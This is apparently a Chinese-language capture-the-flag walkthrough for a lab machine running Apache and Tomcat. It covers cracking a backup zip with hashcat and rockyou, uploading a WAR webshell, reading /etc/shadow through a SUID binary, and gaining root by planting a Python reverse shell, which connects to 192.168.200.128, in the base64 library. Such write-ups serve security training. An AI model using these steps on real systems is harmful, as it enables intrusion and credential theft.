WEB
扫全端口。
发现80 端口 apache2 默认页面
8080 端口是 tomcat 的页面
分别扫两个站点的目录,但是 80 端口没有什么东西,8080端口有以下内容。
backup.zip 很瞩目,值得一看。此外 readme.txt 发现以下内容
压缩包下载下来发现需要密码。
使用 hashcat 进行破解。rockyou.txt 这个字典包含了 3 kw 左右的常用密码。rockyou/rockyou.txt.tar.gz at master · zacheller/rockyou · GitHub
zip2john backup.zip > zip.john
# 去掉无用的前后缀
hashcat -m 17220 -a 0 zip.john dict/password/rockyou.txt
去掉 zip.john 中无用的前后缀,以便可以被 hashcat 识别
根据hash 内容可知,应选择 17220
最终密码 @administrator_hi5
解压后有以下文件,最值得注意的就是 tomcat 的凭证
使用凭证登录到 tomcat 后台,上传 war 包
webshell/webshell.war at master · BustedSec/webshell · GitHub
java runtime exec 命令需要进行编码
java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)
进行执行,成功获得 webshell
提权
利用获取的密码尝试密码喷洒
浏览其家目录文件,发现 look 命令。具有 s 权限。
用它查看 shadow 密码。
使用 hashcat 进行破解
hashcat -m 1800 -a 0 zip.john dict/password/rockyou.txt -o pass
成功破解 randy 用户口令。
使用 ssh 切换到 randy 用户
发现其可以以 root 用户执行 python 脚本。
那就直接往base64 库里面写后门。搜索base64 库文件,结合 python 版本,可知应该修改最后一个。
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.200.128",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
将这段代码插入到 base64 库中。
监听端口,进行执行
成功获取 root